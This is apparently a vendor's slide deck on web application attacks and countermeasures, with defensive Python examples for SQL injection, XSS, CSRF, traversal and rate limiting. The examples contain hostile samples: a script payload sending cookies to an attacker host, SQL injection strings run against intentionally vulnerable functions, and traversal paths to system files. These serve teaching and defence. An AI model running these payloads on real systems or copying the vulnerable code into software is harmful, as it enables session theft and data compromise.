Why you need a Web App Firewall (and more): A Review of Web Application Attacks & Countermeasures
A Review of Web Application Attacks and Countermeasures. There are so many types of Web-based attacks and security risks to watch out for; where do you start? While the details of these attacks vary greatly, the key threat concepts and the main defensive countermeasures are well understood and can be boiled down to a manageable list. Let's take a look at the major attack types that your Microsoft IIS Web servers, database-enabled Web sites and Web-based applications need to be ready for. We will also point you to the Port80 Software solutions that provide countermeasures to these types of attacks.
Network and System Reconnaissance. Camouflage should be "standard issue" for Web servers. The first task of a Web attacker (a cyber criminal, internal or external) is to determine your operating system, Web server, application server and database platforms.
Network and System Reconnaissance, cont. The most successful attacks are often targeted attacks, so removing or obfuscating the signatures of your technology platforms is a countermeasure in itself. The obvious signatures are the Server header, file extensions such as .asp and .aspx, and TCP/IP characteristics such as window size; the subtler ones include default cookie names, ETag formats, HTTP header order, and the services listening on particular IP/port combinations.
Network and System Reconnaissance, cont. This can dissuade intruders from attacking your Web site or application altogether, or force them to make incorrect assumptions that lead them to try the wrong types of attacks (for instance, a Linux/UNIX exploit against a Windows system). Such mistargeted attacks are also easier for firewalls and IDS systems to identify and block. Note that hiding signatures slows down opportunistic scanners rather than stopping a determined attacker; it complements patching and does not replace it. Port80 Solutions: ServerMask
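The audit a practitioner wants here is a way to see exactly which signatures a server still leaks after hardening. The following script is an added example, not Port80 code; it parses a constructed HTTP response (the header values, cookie name and ETag are an assumed sample shaped like an out-of-the-box IIS/ASP.NET reply, not captured from a real host) and reports every platform marker a passive observer could read off it, including header order.

```python
import re

# Constructed sample response (assumed, not captured from a real server).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/7.5\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"X-AspNet-Version: 4.0.30319\r\n"
    b"Set-Cookie: ASP.NET_SessionId=fj2k3l4m5n6o; path=/; HttpOnly\r\n"
    b"ETag: \"b0d1c96f2ac1c41:0\"\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><a href=\"/login.aspx\">login</a></html>"
)

# Headers whose presence or value names the platform outright.
LEAKY_HEADERS = {"server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version"}

# Default session-cookie name prefixes and the platform each reveals.
PLATFORM_COOKIES = [
    ("asp.net_sessionid", "ASP.NET"),
    ("aspsessionid", "classic ASP"),
    ("phpsessid", "PHP"),
    ("jsessionid", "Java servlet container"),
    ("cfid", "ColdFusion"),
]

# File extensions in links that give away the application platform.
PLATFORM_EXTENSIONS = {"aspx": "ASP.NET", "asp": "classic ASP", "php": "PHP",
                       "jsp": "Java", "cfm": "ColdFusion"}


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into status line, ordered header list and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def fingerprint(raw: bytes) -> dict:
    """Return every platform signature a passive observer could read off the response."""
    _, headers, body = parse_response(raw)
    # Header order is itself a signature, so it is always reported.
    findings = {"header_order": [name for name, _ in headers]}
    for name, value in headers:
        lname = name.lower()
        if lname in LEAKY_HEADERS:
            findings[lname] = value
        elif lname == "set-cookie":
            cookie = value.split("=", 1)[0].strip()
            for prefix, platform in PLATFORM_COOKIES:
                if cookie.lower().startswith(prefix):
                    findings.setdefault("cookies", []).append((cookie, platform))
                    break
        elif lname == "etag" and re.fullmatch(r'"[0-9a-f]+:[0-9a-f]+"', value):
            # IIS builds ETags as "<file change number>:<config change number>" in hex.
            findings["etag_style"] = "IIS"
    exts = re.findall(rb"\.(aspx|asp|php|jsp|cfm)\b", body.lower())
    if exts:
        findings["extensions"] = sorted({PLATFORM_EXTENSIONS[e.decode()] for e in exts})
    return findings


if __name__ == "__main__":
    for key, val in fingerprint(SAMPLE_RESPONSE).items():
        print(f"{key}: {val}")
```

Run it against a real server by replacing SAMPLE_RESPONSE with bytes read from a socket; an empty result apart from header_order is the target state, and header_order should then be compared against what a default IIS install emits.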
Image and File Leeching. Do not serve Web content for others unknowingly. A lower-priority attack that costs many sites precious bandwidth and responsiveness is a leeching (hotlinking) attack, where an attacker identifies file resources on your site that are not access controlled or protected by authentication, such as images and video.
Image and File Leeching, cont. They link to the file resource from within their own Web page, so that their visitors fetch your content directly (which you serve and pay the bandwidth for). Those visitors will not know that it is actually your content they are viewing. The fix is to make sure that requests for file resources on a site or application come from a user browsing your site, not from another site that has deep linked to your files.
Image and File Leeching, cont. The countermeasures range from the simple to the more robust: from Referer checking through time-limited or "sessionized" (signed) URLs. Referer checking is cheap, but many browsers, proxies and privacy settings strip the header, so decide explicitly whether a blank Referer is tolerated. You can also weed out the more amateurish leeching bots and scripts by checking the cookie, User-Agent and other HTTP header details of each request. Port80 Solutions: LinkDeny
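Both countermeasures named above, as an added example (not LinkDeny's implementation): a Referer check with an explicit decision about blank Referers, and time-limited URLs signed with an HMAC so that a copied link stops working after the TTL and a tampered path fails verification. SIGNING_KEY, OWN_HOSTS and the media path are assumed values.

```python
import hashlib
import hmac
import time
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlparse

SIGNING_KEY = b"replace-with-a-random-server-side-key"   # assumed; keep out of source control
OWN_HOSTS = {"www.example.com", "example.com"}            # assumed hostnames of this site


def referer_allowed(headers: dict, allow_blank: bool = True) -> bool:
    """Cheapest check: the Referer names one of our own hosts.
    Browsers, proxies and privacy tools often strip Referer, so the caller
    decides whether a blank value is tolerated."""
    referer = headers.get("Referer")
    if not referer:
        return allow_blank
    return urlparse(referer).hostname in OWN_HOSTS


def _mac(path: str, expires: int) -> str:
    return hmac.new(SIGNING_KEY, f"{path}|{expires}".encode(), hashlib.sha256).hexdigest()


def sign_url(path: str, ttl_seconds: int, now: Optional[float] = None) -> str:
    """Produce a time-limited URL; the page that embeds the media calls this."""
    expires = int(time.time() if now is None else now) + ttl_seconds
    return f"{path}?{urlencode({'exp': expires, 'sig': _mac(path, expires)})}"


def verify_url(url: str, now: Optional[float] = None) -> bool:
    """Reject expired, tampered or unsigned requests for a protected file."""
    parts = urlparse(url)
    query = parse_qs(parts.query)
    try:
        expires = int(query["exp"][0])
        sig = query["sig"][0]
    except (KeyError, ValueError):
        return False
    if expires < (time.time() if now is None else now):
        return False
    # Constant-time comparison, so the MAC cannot be guessed byte by byte.
    return hmac.compare_digest(sig, _mac(parts.path, expires))


def serve_media(url: str, headers: dict, now: Optional[float] = None) -> int:
    """HTTP status for a media request: 200 to serve, 403 to refuse.
    A valid signature wins; unsigned legacy links fall back to the Referer check,
    and a link that carries a bad signature is refused regardless of Referer."""
    if verify_url(url, now):
        return 200
    unsigned = "sig" not in parse_qs(urlparse(url).query)
    if unsigned and referer_allowed(headers, allow_blank=False):
        return 200
    return 403
```

The signed form is what the text calls a "sessionized" URL: bind the signature to the session id as well (append it to the MAC input) if a link must not be shareable even before it expires.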
Restricting Access. Block IPs that are no good (up to no good or not good for you). You can also protect against undesired use of your Web content by applying IP-based access control to it. This is often overlooked on sites that use authentication and authorization, but what if you need to host content for anonymous users as well, or exclusively?
Restricting Access, cont. You may still be able to limit your audience, and hence your exposure to malicious requests. If for instance your site or application is designed for users in a handful of specific countries, why let users from other countries (including perhaps those known for a disproportionate share of phishing and fraud) access the content and endlessly probe how it is served, costing you bandwidth in the meantime? And if unwanted traffic persists from a particular site or IP range, why continue to treat that traffic as legitimate? Bear in mind that geolocation is approximate and that attackers can route through proxies, VPNs or compromised hosts in an allowed country, so treat this as a filter rather than a guarantee. Take the client address from the TCP connection, or from a forwarding header set by a proxy you control; a forwarded-for header supplied by the client itself is trivially forged.
Restricting Access, cont. Controlling access to Web content is by no means the same as locking down your Web server, site and application against determined exploits, but it can be a prudent deterrent to further abuse. Port80 Solutions: LinkDeny
SQL Injection Attacks. If it is going in the database, clean it up first. SQL injection attacks use application code to access or corrupt database content. They arrive in a Web request in which user input is handled incorrectly: characters that have meaning in SQL (such as the single quote ' that delimits string literals, the statement separator ; or the comment sequence --) are not escaped, or, more generally, the input is not strongly typed or validated, so it is interpreted and executed as SQL rather than treated as data.
SQL Injection Attacks, cont. You can code to avoid this in your Web application. The primary defense is parameterized queries (prepared statements), so that user input is never concatenated into SQL text at all. Many Web developers do not have the time or the expertise to cover the input validation still needed on top of that, to make sure that: 1. characters passed in URL strings and form fields do not allow for unintended database access and control, and 2. the type of data being passed is what was intended (for example, checking that user-supplied input destined for a numeric field in a SQL statement is indeed numeric).
SQL Injection Attacks, cont. You can also make the database itself more secure with measures such as stored procedures and least-privilege accounts for the application's database connection, so that even a successful injection cannot drop tables or read unrelated data. Still, you need to validate the inputs that reach the database to stop parser-evasion attacks that sneak characters into a string, allowing an attacker to append commands to a normal value to delete or alter database content (or escalate privileges on your application or server itself). Port80 Solutions: ServerDefender AI, ServerDefender VP
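The two failure modes described above (a numeric field and a string field) side by side with their hardened forms, as an added example that is not code from the original deck. It uses an in-memory SQLite table constructed for the demonstration; the numeric check and the parameter binding are the same pattern in any database driver.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the site database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO users (name, is_admin) VALUES (?, ?)",
                   [("alice", 0), ("bob", 1)])
    return db


# --- vulnerable: user input is pasted into the SQL text --------------------
def user_by_id_vulnerable(db, user_id: str):
    """Numeric context: '1 OR 1=1' turns a point lookup into a full dump."""
    return db.execute(
        f"SELECT name FROM users WHERE id = {user_id} ORDER BY id").fetchall()


def public_profile_vulnerable(db, name: str):
    """String context: a quote ends the literal early and -- comments out the
    admin filter that was meant to hide privileged accounts."""
    return db.execute(
        f"SELECT name FROM users WHERE name = '{name}' AND is_admin = 0").fetchall()


# --- hardened: type-check, then bind as a parameter ------------------------
def user_by_id_safe(db, user_id: str):
    if not re.fullmatch(r"[0-9]{1,9}", user_id):      # 1. reject anything non-numeric
        raise ValueError("id must be a positive integer")
    return db.execute("SELECT name FROM users WHERE id = ? ORDER BY id",
                      (int(user_id),)).fetchall()       # 2. bind; never interpolate


def public_profile_safe(db, name: str):
    """Parameter binding sends the value out of band, so quotes and comment
    markers inside it are plain characters, not SQL."""
    return db.execute(
        "SELECT name FROM users WHERE name = ? AND is_admin = 0", (name,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(user_by_id_vulnerable(db, "1 OR 1=1"))        # both rows leak
    print(public_profile_vulnerable(db, "bob' --"))     # admin filter bypassed
    print(public_profile_safe(db, "bob' --"))           # nothing matches
```

A WAF that blocks the obvious strings (`OR 1=1`, `' --`) reduces noise, but the binding is what removes the bug; attackers have many encodings for the same payload.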
Buffer Overflow Attacks. Put some limits on data requested from unknown Web users. Attackers love to throw huge amounts of data at systems to see what limits have been set and whether too much data crammed into a particular form field, header or URL string will crash the system, or lead to remote control of your servers.
Buffer Overflow Attacks, cont. They will pack shellcode (a transferable piece of machine code used as the payload in the exploitation of a software bug, typically containing high-bit bytes that a text-only input filter never expects) into a Web request, hoping that the developer has not placed any length limits on the request and is not checking input into the Web application. Enforcing limits on request, header and field lengths at the server or WAF layer blocks the bulk of these attempts; the underlying fix is bounds checking in whatever native code parses the input. Port80 Solutions: ServerDefender AI, ServerDefender VP
Cross-Site Scripting (XSS) Attacks. Don't become a vector for attacks on other sites or your Web visitors themselves. Often used in conjunction with phishing, social engineering and other browser exploits, XSS attacks inject malicious HTML or client-side script into Web pages viewed by other users. Because the injected script runs in the context of your site, it sidesteps the browser's same-origin policy, which isolates one origin from another but cannot tell your script from the attacker's.
Cross-Site Scripting (XSS) Attacks, cont. By these means, an attacker can gain access to sensitive page content, session cookies and a variety of other client-side objects. The common variants are: reflected (non-persistent) XSS, where data supplied by a Web user is used immediately by server-side script to generate a page of results for that user and is included without HTML encoding; stored (persistent) XSS, where the payload is saved (in a forum post, for example) and served to every visitor; and DOM-based XSS, where the flaw lies in the page's own client-side script, which writes attacker-controlled data such as the URL fragment into the document without the server ever seeing it.
Cross-Site Scripting (XSS) Attacks, cont. If an attacker can convince a user to follow a malicious URL that injects code into the results page, the attacker gets full access to that page's content, and many other traps can be laid for the user, such as false search engine or database search results displaying attacker-designed and -controlled URLs. The fix is output encoding matched to the context (HTML body, attribute, URL, JavaScript) applied to every piece of untrusted data at the point it is written into the page. Port80 Solutions: ServerDefender AI, ServerDefender VP
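The reflected case from the text, rendered into three output contexts (HTML text, an attribute, and a JavaScript string), with the vulnerable page beside the encoded one. This is an added example, not Port80 code; the two payloads are constructed and the search-page markup is assumed. The audit helper parses the rendered page the way a browser would, so it catches an injected event handler as well as an injected script tag.

```python
import html
import json
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed payloads an attacker would place in the q parameter of a search URL.
BODY_PAYLOAD = '<script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def results_page_vulnerable(q: str) -> str:
    """Reflected XSS: the search term is written straight back into the page."""
    return (f"<h1>Results for {q}</h1>"
            f'<input name="q" value="{q}">'
            f"<script>var lastQuery = \"{q}\";</script>")


def js_string(value: str) -> str:
    """JSON-encode for a <script> block; also escape < and > so a payload
    containing </script> cannot close the block early."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def results_page_safe(q: str) -> str:
    """Same page, with an encoder chosen per output context."""
    return (f"<h1>Results for {html.escape(q)}</h1>"                   # HTML text
            f'<input name="q" value="{html.escape(q, quote=True)}">'   # HTML attribute
            f"<a href=\"/search?q={quote(q, safe='')}\">again</a>"      # URL query
            f"<script>var lastQuery = {js_string(q)};</script>")        # JS literal


class _Audit(HTMLParser):
    """Count script elements and collect on* attributes the browser would run."""
    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        self.event_handlers += [name for name, _ in attrs if name.startswith("on")]


def looks_injected(page: str, expected_scripts: int = 1) -> bool:
    """True if more script elements than the template legitimately has, or any
    event-handler attribute, survive into the rendered page."""
    audit = _Audit()
    audit.feed(page)
    audit.close()
    return audit.scripts > expected_scripts or bool(audit.event_handlers)


if __name__ == "__main__":
    for payload in (BODY_PAYLOAD, ATTR_PAYLOAD):
        print("vulnerable:", looks_injected(results_page_vulnerable(payload)),
              " safe:", looks_injected(results_page_safe(payload)))
```

Note that no single encoder covers every slot: html.escape in a JavaScript string, or a URL encoder in an attribute, still leaves a way in, which is why the encoding is chosen per context rather than applied once on input.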
Cross-Site Request Forgery Attacks. Seriously, don't become a vector for indirect attacks on other sites or your visitors. Cross-site request forgery (CSRF or XSRF), also known as a one-click attack or session riding, is an exploit often discussed alongside XSS. Rather than injecting unauthorized code into a Web site, a CSRF attack transmits unauthorized commands on behalf of a user whom the Web site or application considers to be authenticated.
Cross-Site Request Forgery Attacks, cont. At risk are Web sites and applications that perform actions based on requests from authenticated users without requiring the user to authorize the specific action. Because the browser automatically attaches cookies to every request to your domain, a user who is authenticated by a session cookie can be made to send an HTTP request to a site that trusts him, via an image tag or an auto-submitting form on a page the attacker controls, and thereby cause an unwanted action (for instance, withdrawing funds from a bank account). Ajax applications using the XMLHttpRequest (XHR) API are not uniquely at risk: the same-origin policy stops an attacker's page from reading your responses through XHR, but the state-changing request itself can be sent with plain HTML.
Cross-Site Request Forgery Attacks, cont. These attacks are common on Internet forums, where users are allowed to post images but not JavaScript. To combat this, add a transient per-session secret (such as a random hidden form field value, the anti-CSRF token) that must accompany every state-changing request in addition to the persistent cookie-based or HTTP authentication; the attacker's page cannot read that value. A simpler approach, requiring far less code rewriting, is to check that the Referer (or Origin) header names an authorized on-site page. This is weaker than a token: browsers and proxies often strip the Referer, so a missing header has to be rejected for the check to mean anything, and it should not be relied upon exclusively.
Cross-Site Request Forgery Attacks, cont. For Ajax scenarios in particular, a low-cost method is the double-submit cookie: page JavaScript reads a token from a cookie, submits it separately in a header or the body of the GET or POST, and the server checks that the two match, which a cross-site attacker cannot arrange because it cannot read your cookies. Cookie encryption or signing protects the token from tampering but does not by itself stop CSRF, since the browser sends the cookie regardless of who triggered the request. Setting the SameSite attribute on the session cookie is a further browser-side defense in current browsers. Port80 Solutions: ServerDefender AI, ServerDefender VP, LinkDeny (weak protection)
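The server-side check that the three slides above describe, as an added example rather than ServerDefender's implementation: an Origin/Referer check that fails closed, a synchronizer token bound to the session id with an HMAC (so nothing extra has to be stored), and the double-submit variant for Ajax calls. SERVER_KEY, OWN_HOST and the cookie and field names are assumptions.

```python
import hashlib
import hmac
import secrets
from typing import Optional
from urllib.parse import urlparse

SERVER_KEY = b"assumed-per-deployment-secret"   # assumption: generated once per deployment
OWN_HOST = "bank.example"                       # assumption: the application's hostname


def csrf_token_for(session_id: str) -> str:
    """Derive the per-session token; the attacker's page cannot compute or read it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def new_session():
    """Issue a session id plus its bound CSRF token (set the token as a second
    cookie readable by page JavaScript if the double-submit form is used)."""
    session_id = secrets.token_urlsafe(32)
    return session_id, csrf_token_for(session_id)


def source_ok(headers: dict) -> bool:
    """Origin, falling back to Referer; absent on a state change means refuse."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return urlparse(source).hostname == OWN_HOST


def authorize_state_change(method: str, headers: dict, cookies: dict,
                           form: dict) -> Optional[str]:
    """Return None if the request may proceed, otherwise the reason it was refused."""
    if method.upper() not in ("POST", "PUT", "DELETE"):
        return "state changes must not be reachable by GET"    # image tags send GET
    session_id = cookies.get("session")
    if not session_id:
        return "not authenticated"
    if not source_ok(headers):
        return "cross-site source"
    expected = csrf_token_for(session_id)
    supplied = form.get("csrf_token")                          # synchronizer token
    if supplied is None:
        # Double submit: JavaScript on our origin copies the cookie into a header.
        header_token = headers.get("X-CSRF-Token")
        cookie_token = cookies.get("csrf")
        if header_token and cookie_token and hmac.compare_digest(header_token, cookie_token):
            supplied = header_token
    if supplied is None or not hmac.compare_digest(supplied, expected):
        return "missing or invalid CSRF token"
    return None


if __name__ == "__main__":
    sid, tok = new_session()
    print(authorize_state_change("POST", {"Origin": "https://bank.example"},
                                 {"session": sid}, {"csrf_token": tok, "amount": "10"}))
    print(authorize_state_change("POST", {"Origin": "https://evil.example"},
                                 {"session": sid}, {"amount": "1000"}))
```

The forged request in the second call carries the victim's session cookie, exactly as the browser would send it from an attacker's auto-submitting form, and is refused twice over: wrong Origin and no token.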
Directory Traversal Attacks. /admin, /scripts, /noaccess, /etc. If you can get to a file via a URL, an attacker can get to it as well, even if the link is not publicly displayed on your Web site. Also known as ../ (dot dot slash), directory climbing, backtracking and sometimes a canonicalization attack, a directory traversal attack exploits insufficient validation and sanitization of user-supplied URL paths in Web site and application requests.
Directory Traversal Attacks, cont. Although this is often framed as a configuration problem (resources outside the intended tree were reachable because nothing required authentication for them), the root cause is a coding deficiency: the path is used before it is canonicalized and checked against the document root. Windows directory traversal uses the ..\ sequence, although many Windows programs and APIs also accept the UNIX-like ../, but at least most traversal vulnerabilities on Windows are confined to a single drive (C:\, for example).
Directory Traversal Attacks, cont. Though IIS handles simple cases of directory traversal, this is just a start. You need to stop requests to seemingly non-existent Web resources, decode and normalize inputs in all odd or non-standard character encodings (including double percent-encoding and overlong UTF-8 sequences), ensure document roots are known and decoded string lengths are consistent, and confirm that no file outside the document root of the site can be served. Of course, the best response to a directory traversal request (the only one that gives no clues to the attacker) is a good old 404 HTTP response. Port80 Solutions: ServerDefender AI, ServerDefender VP.
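One request-validation routine covering both this section and the buffer overflow section above, as an added example that is not code from the deck: it enforces length caps on the URL, query string and form fields, decodes percent-encoding repeatedly so double-encoded ../ is caught, rejects NUL and high-bit bytes (the "high-bit shellcode" case), treats backslashes as separators, and confirms the canonical path stays under the document root, answering 404 rather than hinting that a traversal was spotted. DOCROOT and LIMITS are assumed values.

```python
import posixpath
from urllib.parse import unquote_to_bytes, urlsplit

DOCROOT = "/var/www/site"                               # assumption: the site's document root
LIMITS = {"url": 2048, "query": 1024, "field": 4096}    # assumed caps; tune per application


def percent_decode(s: str, max_rounds: int = 2) -> bytes:
    """Decode %xx repeatedly: attackers double-encode to slip past a single pass."""
    raw = s.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw


def check_sizes(url: str, form: dict) -> list:
    """Return the limit violations; an empty list means the request is within bounds."""
    problems = []
    if len(url) > LIMITS["url"]:
        problems.append("url too long")
    if len(urlsplit(url).query) > LIMITS["query"]:
        problems.append("query too long")
    for name, value in form.items():
        if len(value) > LIMITS["field"]:
            problems.append(f"field {name} too long")
    return problems


def resolve_under_docroot(request_path: str):
    """Map a request path to a file under DOCROOT, or None if it escapes the root
    or carries bytes a plain path never contains (NUL, high-bit shellcode bytes)."""
    raw = percent_decode(request_path)
    if any(b == 0 or b >= 0x80 for b in raw):
        return None
    path = raw.decode("ascii").replace("\\", "/")     # Windows separators count too
    candidate = posixpath.normpath(posixpath.join(DOCROOT, path.lstrip("/")))
    if candidate != DOCROOT and not candidate.startswith(DOCROOT + "/"):
        return None
    return candidate


def handle(url: str, form: dict) -> int:
    """Status the server should answer with: 413 on oversize, 404 on traversal,
    200 when the request is acceptable."""
    if check_sizes(url, form):
        return 413
    if resolve_under_docroot(urlsplit(url).path) is None:
        return 404        # no hint that a traversal was detected
    return 200


if __name__ == "__main__":
    for p in ("/images/a.png", "/../../etc/passwd", "/%252e%252e/etc/passwd",
              "/..\\..\\windows\\win.ini", "/%90%90%90%90"):
        print(p, "->", resolve_under_docroot(p))
```

A real server must also apply the same canonicalization to any path built from a query parameter or form field (a "file=" download parameter is the classic case), not only to the request URI.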
Zero Day Attacks. Protect against attacks before the patch and after the patch. A zero-day (or zero-hour) attack is not so much a specific type of attack as a special case of all the other types: one that exploits a previously undisclosed or unpatched application vulnerability.
Zero Day Attacks, cont. Zero-day attacks take advantage of security holes for which no fix is yet available. The exploit appears before, or on the same day as, the vulnerability is publicly disclosed, and sometimes on the very day the vendor patch is released. The term refers to the number of days the vendor has had to address the flaw: zero. Even once a patch ships, the interval until it is applied everywhere remains the attacker's window, which is why "after the patch" matters as much as before it.
Zero Day Attacks, cont. As new attacks against IIS and application server code appear, most of them falling into the categories discussed here, it is vital to have a general-purpose Web application firewall covering the bases, protecting the site or app from that attack vector before the platform patches can be applied. Port80 Solutions: ServerDefender AI, ServerDefender VP.
Brute Force Attacks. A, B, C, D, Admin Access... A brute force attack is a method of defeating an authentication scheme by trying a large number of candidate answers; a dictionary attack is the variant that tries likely passwords from a word list rather than every possible combination. The best example is exhaustively working through all possible passwords until the right one is found.
Brute Force Attacks, cont. The same technique is used to guess the names of unlinked directories and files (forced browsing) and to break authentication and authorization layers. Effective request throttling, tracking and limiting the frequency of requests per client to a particular login page or directory, usually defeats this form of automated attack; account lockout and multi-factor authentication close the gap for attempts spread across many source addresses. Port80 Solutions: ServerDefender AI
Denial-of-Service Attack. Too much traffic can be deadly for any Web site. A denial-of-service (DoS) attack is an attempt to make a Web server resource unavailable to its intended users. Although there are many ways to accomplish this, it generally consists of a concerted effort to prevent an Internet site or application from functioning efficiently or at all, temporarily or indefinitely, by flooding it with an unusually high volume of requests, including requests that tie up resources by inducing error states.
Denial-of-Service Attack, cont. This forces the targeted Web server to exhaust its resources (connections, worker threads, memory) so that it can no longer serve legitimate requests. As with a brute force attack, identifying and blocking IP addresses with a high request rate can stop single-source attacks before site resources are used up, keeping legitimate Web users in service. Distributed attacks (DDoS) from many sources are harder to stop at the server itself and generally need upstream filtering as well.
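The throttling and blocking described for brute force and DoS, together with the IP deny list and forwarded-address caveat from the Restricting Access section, in one added example (not Port80 code): a sliding-window counter per client and path, tighter limits on login and admin paths, a temporary ban for repeat offenders, a static CIDR deny list, and a client-address resolver that trusts X-Forwarded-For only when the TCP peer is a known proxy. The ranges used are assumed documentation addresses, and the thresholds are assumptions to tune.

```python
import ipaddress
import time
from collections import defaultdict, deque
from typing import Optional

# Assumed policy; documentation ranges stand in for real ones.
STATIC_DENY = [ipaddress.ip_network("198.51.100.0/24")]    # persistent abusers
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]      # only these may set X-Forwarded-For
PROTECTED_PATHS = ("/login", "/admin")                      # paths with the tight limit


def client_ip(peer: str, forwarded_for: Optional[str]):
    """Resolve the real client. X-Forwarded-For is honoured only when the TCP peer
    is our own proxy, and then only its last entry (the one the proxy appended);
    anything earlier in the list was supplied by the client and may be forged."""
    peer_ip = ipaddress.ip_address(peer)
    if forwarded_for and any(peer_ip in net for net in TRUSTED_PROXIES):
        return ipaddress.ip_address(forwarded_for.split(",")[-1].strip())
    return peer_ip


class RateLimiter:
    """Sliding-window request counter; repeat offenders get a temporary ban."""

    def __init__(self, limit=5, window=10.0, ban_after=3, ban_seconds=600.0):
        self.limit, self.window = limit, window             # per protected path
        self.ban_after, self.ban_seconds = ban_after, ban_seconds
        self.hits = defaultdict(deque)                      # (ip, key) -> timestamps
        self.strikes = defaultdict(int)                     # ip -> windows exceeded
        self.banned_until = {}                              # ip -> unban time

    def decide(self, ip, path: str, now: Optional[float] = None) -> str:
        """Return 'deny', 'banned', 'throttled' or 'allow'."""
        now = time.time() if now is None else now
        if any(ip in net for net in STATIC_DENY):
            return "deny"
        if self.banned_until.get(ip, 0) > now:
            return "banned"
        protected = path.startswith(PROTECTED_PATHS)
        limit = self.limit if protected else self.limit * 20  # looser site-wide cap
        window = self.hits[(ip, path if protected else "*")]
        while window and window[0] <= now - self.window:      # drop expired hits
            window.popleft()
        window.append(now)
        if len(window) > limit:
            self.strikes[ip] += 1
            if self.strikes[ip] >= self.ban_after:
                self.banned_until[ip] = now + self.ban_seconds
                return "banned"
            return "throttled"
        return "allow"


if __name__ == "__main__":
    limiter = RateLimiter()
    attacker = client_ip("10.1.2.3", "1.2.3.4, 203.0.113.7")   # proxy appended the real peer
    for i in range(8):
        print(i, limiter.decide(attacker, "/login", now=100 + i))
```

The limiter keys on the resolved client address, so a single host cannot escape its quota by spraying forged X-Forwarded-For values; against a distributed attack the per-IP limits still hold the login path, which is the part a WAF can defend on its own.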
Privilege Escalation Attacks. Control is the ultimate goal of all attackers. At the end of the day, almost every Web attack is an attempt to escalate privileges and gain remote control over your Web sites, apps, data and user communities. Privilege escalation is the act of exploiting a bug in an application to gain access to resources that would normally be protected from an application or user with lower privileges.
Privilege Escalation Attacks, cont. The result is that the Web application performs actions in a higher security context intended for Web developers or system administrators. Buffer overflows lead to privilege escalation directly; XSS and CSRF do so indirectly, by letting the attacker act with a victim user's privileges. Most attacks aim at getting admin privileges on the target Web site, and historically have exploited IIS components such as the .printer ISAPI extension and Remote Data Services, up to running a command shell with administrator or application-pool privileges. At that point your Web server is the attacker's Web server, and they will quickly look to attack the rest of your network from that beachhead. Port80 Solutions: ServerDefender AI, ServerDefender VP.
Defense-in-Depth Works. How do you avoid being fully hacked? In general, it goes without saying that you should protect your ports and network with a standard network firewall, keep patching your OS, Web, app and DB layers, require authentication for the secure sections of the site, and learn as much as possible about the security options available in your development platform, whether ASP, ASP.NET, ColdFusion, PHP, JSP or another type of Web application framework.
Defense-in-Depth Works, cont. By additionally layering in Port80 Software's security solutions, you augment these controls to directly protect your Microsoft IIS Web server, Web apps and data from attackers on the Internet. A Web application firewall is one layer among several: it blocks known patterns and buys time, but it does not substitute for fixing the application code behind it.
About Port80 Software: Solutions for Microsoft IIS Web Servers. Port80 software exposes control over server-side functionality for developers and streamlines tasks for administrators: Increase security by locking down what information you broadcast and blocking intruders with ServerMask and ServerDefender. Protect your intellectual property by preventing hotlinking with LinkDeny. Improve performance: compress pages and manage cache controls for faster load times and bandwidth savings with CacheRight, httpZip and ZipEnable. Upgrade Web development tools: negotiate content based on device, language or other parameters with PageXchanger, and tighten code with w3compiler. Visit us online @ www.port80software.com

More Related Content

What's hot (20)

PPTX
Owasp top 10 security threats
Vishal Kumar
 
PPTX
Owasp first5 presentation
Ashwini Paranjpe
 
PDF
OWASP Top 10 - 2017
HackerOne
 
PPTX
Owasp 2017 oveview
Shreyas N
 
PDF
Testing Web Application Security
Ted Husted
 
PPTX
Web application security
Kapil Sharma
 
PPTX
OWASP Top 10 - 2017 Top 10 web application security risks
Kun-Da Wu
 
PPTX
Owasp top 10 vulnerabilities
OWASP Delhi
 
PPT
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
PDF
Web Application Security and Awareness
Abdul Rahman Sherzad
 
PPTX
OWASP Top 10 Vulnerabilities 2017- AppTrana
Ishan Mathur
 
PPTX
Microservices Security
Aditi Anand
 
PPT
OWASP Serbia - A3 broken authentication and session management
Nikola Milosevic
 
PDF
Owasp top 10
YasserElsnbary
 
PDF
The Complete Web Application Security Testing Checklist
Cigital
 
PPTX
Web Application Vulnerabilities
Preetish Panda
 
PDF
Realities of Security in the Cloud - CSS ATX 2017
Alert Logic
 
PDF
Security-testing presentation
Ezhilan Elangovan (Eril)
 
PPTX
OWASP Top 10 2017 - New Vulnerabilities
Dilum Bandara
 
PDF
OWASP Top 10 2017
Siddharth Phatarphod
 
Owasp top 10 security threats
Vishal Kumar
 
Owasp first5 presentation
Ashwini Paranjpe
 
OWASP Top 10 - 2017
HackerOne
 
Owasp 2017 oveview
Shreyas N
 
Testing Web Application Security
Ted Husted
 
Web application security
Kapil Sharma
 
OWASP Top 10 - 2017 Top 10 web application security risks
Kun-Da Wu
 
Owasp top 10 vulnerabilities
OWASP Delhi
 
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
Web Application Security and Awareness
Abdul Rahman Sherzad
 
